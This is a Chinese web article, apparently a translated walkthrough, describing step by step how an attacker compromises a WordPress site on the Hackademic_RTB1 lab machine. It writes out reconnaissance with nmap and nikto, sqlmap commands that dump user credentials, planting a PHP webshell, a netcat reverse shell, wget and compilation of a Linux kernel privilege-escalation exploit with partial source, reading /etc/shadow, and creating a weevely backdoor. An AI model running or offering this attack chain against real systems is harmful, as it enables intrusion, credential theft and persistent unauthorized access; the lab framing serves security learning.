0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內(nèi)不再提示

黑客常用的入手思路和技術(shù)手法

Android編程精選 ? 來源:Android編程精選 ? 作者:Android編程精選 ? 2022-07-27 10:44 ? 次閱讀

通過本文你將了解黑客常用的入手思路和技術(shù)手法,適合熱愛網(wǎng)絡信息安全的新手朋友了解學習。本文將從最開始的信息收集開始講述黑客是如何一步步的攻破你的網(wǎng)站和服務器的。閱讀本文你會學到以下內(nèi)容: 1.滲透測試前的簡單信息收集。 2.sqlmap的使用 3.nmap的使用 4.nc反彈提權(quán) 5.linux系統(tǒng)的權(quán)限提升 6.backtrack 5中滲透測試工具nikto和w3af的使用等. 假設黑客要入侵的你的網(wǎng)站域名為:hack-test.com 讓我們用ping命令獲取網(wǎng)站服務器的IP地址 564710fa-0cd9-11ed-ba43-dac502259ad0.jpg ? 現(xiàn)在我們獲取了網(wǎng)站服務器的IP地址為:173.236.138.113 ? 尋找同一服務器上的其它網(wǎng)站,我們使用sameip.org. ? 5664df0e-0cd9-11ed-ba43-dac502259ad0.jpg ? 26 sites hosted on IP Address 173.236.138.113 ?

ID Domain Site Link
1 hijackthisforum.com hijackthisforum.com
2 sportforum.net sportforum.net
3 freeonlinesudoku.net freeonlinesudoku.net
4 cosplayhell.com cosplayhell.com
5 videogamenews.org videogamenews.org
6 gametour.com gametour.com
7 qualitypetsitting.net qualitypetsitting.net
8 brendanichols.com brendanichols.com
9 8ez.com 8ez.com
10 hack-test.com hack-test.com
11 kisax.com kisax.com
12 paisans.com paisans.com
13 mghz.com mghz.com
14 debateful.com debateful.com
15 jazzygoodtimes.com jazzygoodtimes.com
16 fruny.com fruny.com
17 vbum.com vbum.com
18 wuckie.com wuckie.com
19 force5inc.com force5inc.com
20 virushero.com virushero.com
21 twincitiesbusinesspeernetwork.com twincitiesbusinesspeernetwork.com
22 jennieko.com jennieko.com
23 davereedy.com davereedy.com
24 joygarrido.com joygarrido.com
25 prismapp.com prismapp.com
26 utiligolf.com utiligolf.com

173.236.138.113上有26個網(wǎng)站,很多黑客為了攻破你的網(wǎng)站可能會檢查同服務器上的其它網(wǎng)站,但是本次是以研究為目標,我們將拋開服務器上的其它網(wǎng)站,只針對你的網(wǎng)站來進行入侵檢測。 我們需要關(guān)于你網(wǎng)站的以下信息: 1. DNS records (A, NS, TXT, MX and SOA) 2. Web Server Type (Apache, IIS, Tomcat) 3. Registrar (the company that owns your domain) 4. Your name, address, email and phone 5. Scripts that your site uses (php, asp, asp.net, jsp, cfm) 6. Your server OS (Unix,Linux,Windows,Solaris) 7. Your server open ports to internet (80, 443, 21, etc.) 讓我們開始找你網(wǎng)站的DNS記錄,我們用who.is來完成這一目標. 56858178-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們發(fā)現(xiàn)你的DNS記錄如下 ? 5694affe-0cd9-11ed-ba43-dac502259ad0.jpg ? ?讓我們來確定web服務器的類型 ? 56a853ec-0cd9-11ed-ba43-dac502259ad0.jpg ? 發(fā)現(xiàn)你的Web服務器是apache,接下來確定它的版本. ? ?IP:?173.236.138.113 Website Status:?active Server Type: Apache Alexa Trend/Rank:??1 Month:3,213,968 3 Month: 2,161,753 Page Views per Visit:??1 Month: 2.0 3Month: 3.7 ? 接下來是時候?qū)ふ夷憔W(wǎng)站域名的注冊信息,你的電話、郵箱、地址等. ? 56babc26-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們現(xiàn)在已經(jīng)獲取了你的網(wǎng)站域名的注冊信息,包括你的重要信息等. ? 我們可以通過backtrack5中的whatweb來獲取你的網(wǎng)站服務器操作系統(tǒng)類型和服務器的版本. ? 56da4eec-0cd9-11ed-ba43-dac502259ad0.png56f80b3a-0cd9-11ed-ba43-dac502259ad0.png ? 我們發(fā)現(xiàn)你的網(wǎng)站使用了著名的php整站程序wordpress,服務器的的系統(tǒng)類型為FedoraLinux,Web服務器版本Apache 2.2.15.繼續(xù)查看網(wǎng)站服務器開放的端口,用滲透測試工具nmap: ? 1-Find services that run on server(查看服務器上運行的服務) ? 570b3a8e-0cd9-11ed-ba43-dac502259ad0.jpg ? 2-Find server OS(查看操作系統(tǒng)版本) ? 5729e0ce-0cd9-11ed-ba43-dac502259ad0.jpg ? 只有80端口是開放的,操作系統(tǒng)是Linux2.6.22(Fedora Core 6),現(xiàn)在我們已經(jīng)收集了所有關(guān)于你網(wǎng)站的重要信息,接下來開始掃描尋找漏洞,比如: ? Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等. ? 我們將使用Nikto來收集漏洞信息: ? root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com ? 574a97c4-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們也會用到Backtrack 5 R1中的W3AF 工具: ? root@bt:/pentest/web/w3af#./w3af_gui ? 575f3b0c-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們輸入要檢測的網(wǎng)站地址,選擇完整的安全審計選項. ? 57719b26-0cd9-11ed-ba43-dac502259ad0.jpg ? 稍等一會,你將會看到掃描結(jié)果. ? 57880e9c-0cd9-11ed-ba43-dac502259ad0.jpg ? ?發(fā)現(xiàn)你的網(wǎng)站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞. ? http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 ? 我們通過工具發(fā)現(xiàn)這個URL存在SQL注入,我們通過Sqlmap來檢測這個url. ? Using sqlmap with –u url ? 57a40dc2-0cd9-11ed-ba43-dac502259ad0.png ? 過一會你會看到 ? 57b490de-0cd9-11ed-ba43-dac502259ad0.png ? 輸入N按回車鍵繼續(xù) ? 57d2e2b4-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們發(fā)現(xiàn)你的網(wǎng)站存在mysql顯錯注入,mysql數(shù)據(jù)庫版本是5.0. 我們通過加入?yún)?shù)”-dbs”來嘗試采集數(shù)據(jù)庫名. ? 57e7e38a-0cd9-11ed-ba43-dac502259ad0.png ? 57fe3a40-0cd9-11ed-ba43-dac502259ad0.png ? 發(fā)現(xiàn)三個數(shù)據(jù)庫,接下來通過參數(shù)”-D wordpress -tables”來查看wordpress數(shù)據(jù)庫的所有表名 ? 580bb1fc-0cd9-11ed-ba43-dac502259ad0.png ? 582612ea-0cd9-11ed-ba43-dac502259ad0.jpg ? 通過參數(shù)“-T wp_users –columns ”來查看wp_users表中的字段. ? 583be868-0cd9-11ed-ba43-dac502259ad0.png ? 584ed6a8-0cd9-11ed-ba43-dac502259ad0.jpg ? 接下來猜解字段user_login和user_pass的值.用參數(shù)”-C user_login,user_pass–dump” ? 5861a9ea-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們會發(fā)現(xiàn)用戶名和密碼hashes值. 我們需要通過以下在線破解網(wǎng)站來破解密碼hashes ? http://www.onlinehashcrack.com/free-hash-reverse.php ? 5879bfa8-0cd9-11ed-ba43-dac502259ad0.png 登陸wordpress的后臺wp-admin ? 嘗試上傳php webshell到服務器,以方便運行一些linux命令.在插件頁面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點擊更新文件,然后訪問我們的phpwebshell. ? 5889a814-0cd9-11ed-ba43-dac502259ad0.jpg58a26c46-0cd9-11ed-ba43-dac502259ad0.jpg ? Phpwebshell被解析了,我們可以控制你網(wǎng)站的文件,但是我們只希望獲得網(wǎng)站服務器的root權(quán)限,來入侵服務器上其它的網(wǎng)站。 ? 我們用NC來反彈一個shell,首先在我們的電腦上監(jiān)聽5555端口. ? 58b0851a-0cd9-11ed-ba43-dac502259ad0.png ? 然后在Php webshell上反向連接我們的電腦,輸入你的IP和端口5555. ? 58c6be0c-0cd9-11ed-ba43-dac502259ad0.jpg 點擊連接我們會看到 ? 58e26238-0cd9-11ed-ba43-dac502259ad0.png ? 接下來我們嘗試執(zhí)行一些命令:

id
uid=48(apache) gid=489(apache) groups=489(apache) (用來顯示用戶的id和組)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins (顯示服務器上當前的路徑)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 72145 EST 2009 i686 i686 i386 GNU/Linux
(顯示內(nèi)核版本信息) 58f7fc42-0cd9-11ed-ba43-dac502259ad0.jpg ? 現(xiàn)在我們知道,服務器的內(nèi)核版本是2.6.31.5-127.fc12.1686,我們在exploit-db.com中搜索此版本的相關(guān)漏洞.
在服務器上測試了很多exp之后,我們用以下的exp來提升權(quán)限. http://www.exploit-db.com/exploits/15285 我們在nc shell上執(zhí)行以下命令: wgethttp://www.exploit-db.com/exploits/15285 -o roro.c (下載exp到服務器并重命名為roro.c)
注:很多l(xiāng)inux內(nèi)核的exp都是C語言開發(fā)的,因此我們保存為.c擴展名.
exp roro.c代碼如下:

#include#include#include#include#include#include#include#include#include#include#include#define RECVPORT 5555#define SENDPORT 6666int prep_sock(int port){int s, ret;struct sockaddr_in addr;s = socket(PF_RDS, SOCK_SEQPACKET, 0);if(s < 0){printf(“[*] Could not open socket.”);exit(-1);}memset(&addr, 0, sizeof(addr));
通過以上代碼我們發(fā)現(xiàn)該exp是C語言開發(fā)的,我們需要將它編譯成elf格式的,命令如下: gcc roro.c –ororo 接下來執(zhí)行編譯好的exp ./roro 5914aed2-0cd9-11ed-ba43-dac502259ad0.jpg ? 執(zhí)行完成之后我們輸入id命令
id
我們發(fā)現(xiàn)我們已經(jīng)是root權(quán)限了
uid=0(root) gid=0(root) 592c7152-0cd9-11ed-ba43-dac502259ad0.png ? 現(xiàn)在我們可以查看/etc/shadow文件
cat/etc/shadow 5944a060-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們可以使用”john theripper”工具破解所有用戶的密碼.但是我們不會這樣做,我們需要在這個服務器上留下后門以方便我們在任何時候訪問它. ? 我們用weevely制作一個php小馬上傳到服務器上. ? 1.weevely使用選項
root@bt:/pentest/backdoors/web/weevely#./main.py - 59623c38-0cd9-11ed-ba43-dac502259ad0.jpg ? 2.用weevely創(chuàng)建一個密碼為koko的php后門 ? root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko ? 596fae04-0cd9-11ed-ba43-dac502259ad0.jpg ? 接下來上傳到服務器之后來使用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko 598135de-0cd9-11ed-ba43-dac502259ad0.jpg ? 測試我們的hax.php后門 ? 5993ec4c-0cd9-11ed-ba43-dac502259ad0.jpg
審核編輯:彭靜
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務器
    +關(guān)注

    關(guān)注

    12

    文章

    8701

    瀏覽量

    84548
  • 黑客
    +關(guān)注

    關(guān)注

    3

    文章

    284

    瀏覽量

    21776
  • 網(wǎng)絡信息
    +關(guān)注

    關(guān)注

    0

    文章

    27

    瀏覽量

    10234

原文標題:黑客是如何攻破一個網(wǎng)站的?

文章出處:【微信號:AndroidPush,微信公眾號:Android編程精選】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    SiRider S1芯擎工業(yè)開發(fā)板測評+1.防止黑客入侵通信監(jiān)控系統(tǒng)(PSA)

    選!當然啦,如果你覺得它太厲害了有點害怕的話,那就把它想象成一個友好的機器人伙伴吧,它會一直陪伴你走過每一個技術(shù)難關(guān)的! 接下來咱們開始一起使用SiRider S1防止黑客監(jiān)控吧!這事兒聽起來挺嚴肅
    發(fā)表于 09-08 21:58

    AMD遇黑客攻擊,但稱運營無大礙

    近日,科技圈傳來一則震驚的消息:全球知名的半導體制造商AMD公司遭遇了黑客組織的攻擊。據(jù)悉,一個名為Intelbroker的黑客組織成功入侵了AMD的系統(tǒng),并盜取了包括未來產(chǎn)品詳細信息、客戶數(shù)據(jù)庫、財務記錄、源代碼、固件等一系列敏感信息。
    的頭像 發(fā)表于 06-24 11:00 ?430次閱讀

    環(huán)球晶遭黑客攻擊!

    6月14日消息,環(huán)球晶6月13日發(fā)布公告,稱部分資訊系統(tǒng)遭受黑客攻擊,目前正積極會同技術(shù)專家協(xié)助調(diào)查和復原工作。環(huán)球晶表示,少數(shù)廠區(qū)部分產(chǎn)線受到影響,將會先使用庫存出貨因應,若有不足,有的可能要延遲
    的頭像 發(fā)表于 06-14 16:27 ?366次閱讀
    環(huán)球晶遭<b class='flag-5'>黑客</b>攻擊!

    如何構(gòu)筑身份安全防線,避免被黑客“登入”企業(yè)網(wǎng)絡?

    黑客常用的攻擊手段,從用盡十八般武藝、不可告人的“侵入”,變成憑借有效賬戶、大搖大擺的“登入”,你會不會覺得不可思議?
    的頭像 發(fā)表于 03-28 13:44 ?398次閱讀
    如何構(gòu)筑身份安全防線,避免被<b class='flag-5'>黑客</b>“登入”企業(yè)網(wǎng)絡?

    自學STM32的話應該從哪入手

    麻煩問一下自學STM32應該怎樣入手呢,很多庫文件引用有點看不懂,是要從51開始學起嗎
    發(fā)表于 03-21 09:28

    請求黑客幫忙

    請問這里有沒有可以幫我恢復之前已刪除的微信聊天記錄黑客高手啊?
    發(fā)表于 03-09 12:05

    物聯(lián)網(wǎng)領域常用的定位技術(shù)有哪些?

    物聯(lián)網(wǎng)領域常用的定位技術(shù)有哪些? 物聯(lián)網(wǎng)領域常用的定位技術(shù)有許多,包括全球衛(wèi)星導航系統(tǒng)(GNSS)、蜂窩網(wǎng)絡定位、無線局域網(wǎng)定位、藍牙定位、超寬帶定位、射頻識別(RFID)等。本文將詳
    的頭像 發(fā)表于 12-12 14:40 ?3162次閱讀

    LDMOS在ESD設計中的應用設計思路

    LDMOS屬于功率半導體器件,主要應用于高壓場合。而針對高壓芯片的ESD防護領域,可采取GGNLDMOS的設計思路。
    發(fā)表于 12-06 13:54 ?5425次閱讀
    LDMOS在ESD設計中的應用設計<b class='flag-5'>思路</b>

    PCB布局八卦陣分析思路

    PCB布局八卦陣分析思路
    的頭像 發(fā)表于 11-24 17:20 ?391次閱讀

    DC/DC電源裝置并聯(lián)技術(shù)思路

    電子發(fā)燒友網(wǎng)站提供《DC/DC電源裝置并聯(lián)技術(shù)思路.doc》資料免費下載
    發(fā)表于 11-14 14:44 ?0次下載
    DC/DC電源裝置并聯(lián)<b class='flag-5'>技術(shù)</b><b class='flag-5'>思路</b>

    網(wǎng)絡型地鐵門禁設計思路

    電子發(fā)燒友網(wǎng)站提供《網(wǎng)絡型地鐵門禁設計思路.doc》資料免費下載
    發(fā)表于 11-10 16:04 ?0次下載
    網(wǎng)絡型地鐵門禁設計<b class='flag-5'>思路</b>

    ESD靜電整改有什么基本思路?

    ESD靜電整改有什么基本思路?|深圳比創(chuàng)達電子EMC
    的頭像 發(fā)表于 11-02 10:08 ?655次閱讀

    電路設計的思路和原則

    在線電路設計這個詞對我們來說仍稍顯陌生,但提起云計算相信大家都耳熟能詳了,而在線電路設計就是將專業(yè)的工程設計與云端相結(jié)合的一種設計思路,實際上這一概念和實際產(chǎn)品已經(jīng)在歐美等國家悄然興起并開始進入國內(nèi)。接下來我給大家介紹一下電路設計的思路和原則有哪些?
    的頭像 發(fā)表于 10-15 12:11 ?1512次閱讀

    淺談2023年10種新興威脅趨勢和黑客攻擊手法

    安全研究人員發(fā)現(xiàn),今天的攻擊者更加關(guān)注竊取數(shù)據(jù)和獲取利益,因此他們在實施網(wǎng)絡攻擊時,會盡量避免給受害者帶來嚴重的破壞,因此不再使用大范圍加密數(shù)據(jù)的攻擊模式,而是選擇最小破壞性的攻擊手法。
    發(fā)表于 10-08 15:31 ?513次閱讀

    UVC bulk傳輸實現(xiàn)思路

    前段時間有個讀者咨詢UVC bulk 傳輸實現(xiàn),接著這個機會重新梳理一遍UVC bulk 傳輸實現(xiàn)思路,同時對比ISO 與 Bulk 實現(xiàn)不同。
    的頭像 發(fā)表于 09-25 10:00 ?4228次閱讀
    UVC bulk傳輸實現(xiàn)<b class='flag-5'>思路</b>